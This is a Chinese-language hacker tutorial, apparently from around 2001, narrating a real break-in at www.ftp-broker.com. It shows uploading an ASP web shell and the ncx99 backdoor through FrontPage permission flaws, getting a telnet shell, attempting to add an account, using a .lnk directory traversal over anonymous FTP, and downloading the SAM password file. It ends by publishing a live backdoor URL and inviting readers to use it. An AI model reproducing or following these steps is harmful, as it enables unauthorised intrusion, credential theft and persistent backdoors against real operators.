|
攻击www.ftp-broker.com全攻略
今天在再次浏览Transoft Broker .lnk目录遍历漏洞的时候。突然冒出想试一下这个漏
洞的念头。于是用流光扫出了N的IP。试了每一个IP的FTP都不是那个。于
------------------------------------------------------------------------
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.ftp-broker.com/
------------------------------------------------------------------------
所性就试他吧。
我先PING了一下。
C:\>ping www.ftp-broker.com
Pinging ftp-broker.com [194.144.203.10] with 32 bytes of data:
Reply from 194.144.203.10: bytes=32 time=441ms TTL=106
Reply from 194.144.203.10: bytes=32 time=450ms TTL=106
Reply from 194.144.203.10: bytes=32 time=421ms TTL=106
Reply from 194.144.203.10: bytes=32 time=420ms TTL=106
Ping statistics for 194.144.203.10:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 420ms, Maximum = 450ms, Average = 433ms
NT的机子,这个不说也知道。没有防火墙。
于是又简单的扫了一下。
发现:
PORT-> 主机 194.144.203.10 端口 0080 ...开放
PORT-> 主机 194.144.203.10 端口 0021 ...开放
PORT-> 主机 194.144.203.10 端口 0110 ...开放
PORT-> 主机 194.144.203.10 端口 0079 ...开放
PORT-> 主机 194.144.203.10 端口 0443 ...开放
IIS-> 主机 194.144.203.10 IIS检测 FrontPage 扩展默认权限错误 ...成功
PORT-> 主机 194.144.203.10 端口 1433 ...开放
PORT-> 主机 194.144.203.10 端口 1433 ...开放
服务还真多呀。
IIS-> 主机 194.144.203.10 IIS检测 FrontPage 扩展默认权限错误 ...成功
比较重要。
来网络邻居上。
添加网络邻居=>输入http://194.144.203.10/=>完成
进去了。看见他有几个目录,没有大用。先上传一个ASP木马。OK,上传成功。
在IE上输入http://194.144.203.10/cmd.asp(cmd.asp是ASP木马,在红客有的下。)出
现了命令表单。输入dir c:\再点RUN。
出现如下内容:
Volume in drive C has no label.
Volume Serial Number is F059-16D9
Directory of c:\
12.08.00 16:48 <DIR>
Alixoft
09.06.99 05:44
0 AUTOEXEC.BAT
25.10.00 11:21 <DIR>
Backup
09.06.99 05:44
0 CONFIG.SYS
17.12.00 14:54
11.460 debug.txt
09.03.01 15:09
5.119.704 ftpctrl.exe
09.06.99 15:12 <DIR>
InetPub
10.05.01 20:47
0 LogTCP.txt
07.10.99 15:26 <DIR>
MSSQL7
09.06.99 14:56 <DIR>
Multimedia Files
10.06.99 11:55 <DIR>
Netdir
08.07.01 22:47
268.435.456 pagefile.sys
27.06.01 12:45 <DIR>
Program Files
14.07.01 08:24
0 rad442B1.tmp
14.07.01 11:56
0 radD4EFA.tmp
15.12.99 12:41
602 skilabod.txt
22.10.00 21:23
0 SQL.LOG
13.07.01 10:28 <DIR>
TEMP
01.07.00 11:20 <DIR>
web
14.07.01 11:42 <DIR>
WINNT
10.05.01 20:46
184.504 winzip.log
21 File(s) 273.751.726 bytes
520.518.656 bytes free
这就已经成功了一半。
接着上传NCX99。上传成功。用那个ASP木马激活就可以了。但是所在的WEB目录在哪里呢
?这怎么办。别急呀。凭着经验来说一般放在C:\InetPub\wwwroot\里面于是用那个ASP
木马输入:dir c:\InetPub\wwwroot\
反回:
Volume in drive C has no label.
Volume Serial Number is F059-16D9
Directory of c:\inetpub\wwwroot
07.10.99 15:32 <DIR>
.
07.10.99 15:32 <DIR>
..
09.06.99 15:19 <DIR>
cgi-bin
10.06.99 09:56
192 Default.htm
09.06.99 15:19 <DIR>
images
09.06.99 15:25 <DIR>
Phone Book Service
09.06.99 15:19
2.504 postinfo.html
10.06.99 09:56 <DIR>
samples
09.06.99 15:19 <DIR>
_private
13.03.00 14:06
1.759 _vti_inf.html
10 File(s) 4.455 bytes
520.522.752 bytes free
没有。不会吧那放在哪里了。看看那个WEB没有。又找了几个看着像的目录。也没有。不
会吧。他放在哪里了。大家别急。这我也有办法。
还是用那个ASP木马。输入dir c:\ncx99.exe /a /s
出现:
Volume in drive C has no label.
Volume Serial Number is F059-16D9
C盘是没有了。再输入dir d:\ncx99.exe /a /s
出现:
Volume in drive D is mall
Volume Serial Number is 7C5F-AB28
Directory of D:\Control\www\root
14.07.01 08:11
59.392 ncx99.exe
1 File(s) 59.392 bytes
Directory of D:\Control\www\root\_vti_cnf
14.07.01 08:11
206 ncx99.exe
1 File(s)
206 bytes
Total Files Listed:
2 File(s) 59.598 bytes
588.236.800 bytes free
对就是这个目录。D:\Control\www\root
再输入:dir D:\Control\www\root
出现:
Volume in drive D is mall
Volume Serial Number is 7C5F-AB28
Directory of D:\Control\www\root
14.07.01 09:24 <DIR>
.
14.07.01 09:24 <DIR>
..
25.10.00 13:02 <DIR>
cgibin
25.10.00 13:08
877 default.htm
25.10.00 13:02 <DIR>
images
14.07.01 08:10
1.276 cmd.asp
14.07.01 08:11
59.392 ncx99.exe
04.09.00 10:38
2.506 postinfo.html
25.10.00 13:02 <DIR>
templates
04.09.00 10:52 <DIR>
text
14.07.01 08:31 <DIR>
_private
04.09.00 10:39
1.759 _vti_inf.html
25.10.00 13:01 <DIR>
_vti_log
19 File(s) 102.755 bytes
588.236.800 bytes free
NCX99和ASP木马都在,再用那个ASP木马激活NCX99。
输入:D:\Control\www\root\ncx99.exe
打开一个DOS窗口输入:telnet 194.144.203.10 99
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>
YES,进来了。
C:\WINNT\system32>cd \
C:\>dir
Volume in drive C has no label.
Volume Serial Number is F059-16D9
Directory of C:\
12.08.00 16:48 <DIR>
Alixoft
09.06.99 05:44
0 AUTOEXEC.BAT
25.10.00 11:21 <DIR>
Backup
09.06.99 05:44
0 CONFIG.SYS
17.12.00 14:54
11.460 debug.txt
09.03.01 15:09
5.119.704 ftpctrl.exe
09.06.99 15:12 <DIR>
InetPub
10.05.01 20:47
0 LogTCP.txt
07.10.99 15:26 <DIR>
MSSQL7
09.06.99 14:56 <DIR>
Multimedia Files
10.06.99 11:55 <DIR>
Netdir
08.07.01 22:47
268.435.456 pagefile.sys
27.06.01 12:45 <DIR>
Program Files
14.07.01 08:24
0 rad442B1.tmp
14.07.01 12:09
0 radBDADB.tmp
15.12.99 12:41
602 skilabod.txt
22.10.00 21:23
0 SQL.LOG
13.07.01 10:28 <DIR>
TEMP
01.07.00 11:20 <DIR>
web
14.07.01 11:57 <DIR>
WINNT
10.05.01 20:46
184.504 winzip.log
21 File(s) 273.751.726 bytes
520.523.776 bytes free
看到C:\了。
第一个应该想到的就是。
C:\>net user shadow shadow /add
System error 1312 has occurred.
A specified logon session does not exist. It may already have
been terminated.
加一个用户进去。但是没有成功。
算了。还是想其他的方法吧。
这个时候突然想到我刚才看到的Transoft Broker .lnk目录遍历漏洞。对就用他。
自己在自己的机子上先建一个快捷方式。建一个C:\的快捷方式。名字为system32
接下来试一下那台主机的FTP。
再打开一个DOS窗口输入:
ftp 194.144.203.10
anonymous就可以进来。
但是没有上载权呀。怎么办呢。
用那个TELNET上去的COPY过来吧。
OK过来了。
接下来还是用IE打开那个FTP窗吧。
只见有两个目录,其中一个是那个LNK。又击进去成功。到了C:盘。但是因为是由anon
ymous进来的没有上载权呀。但是这已经成功一大半了。
可以下载东西了。二话不说先把SAM当下来。一会下来再解吧。
现在开始找http://www.ftp-broker.com/所在的目录吧。
在IE里输入网址后在地址栏出现:http://www.ftp-broker.com/cgibin/PageExe.exe?H
=3999+&C=1&P=1
好办了。只要找到那个PageExe.exe在哪里就好办了。还是用dir c:PageExe.exe /a /s
结果在D盘的一个目录里找到了,接下来不多说了。自己干吧。
在我写这文章的时候。那个网已经关掉了他的FTP。也DEL我中的木马。但是还有一个我
中的后门他们没有发现。就是
http://www.ftp-broker.com/cgibin/info.exe?/c+dir+c:\
大家自己玩吧。
我写这篇文章不是为了别的。想说一句。攻击网站有多种的方法。也要动脑去想。
写给新手看的。绿盟的大哥们就算了。
SHADOW所作。注意如果转载请保持文章完整。谢谢。 |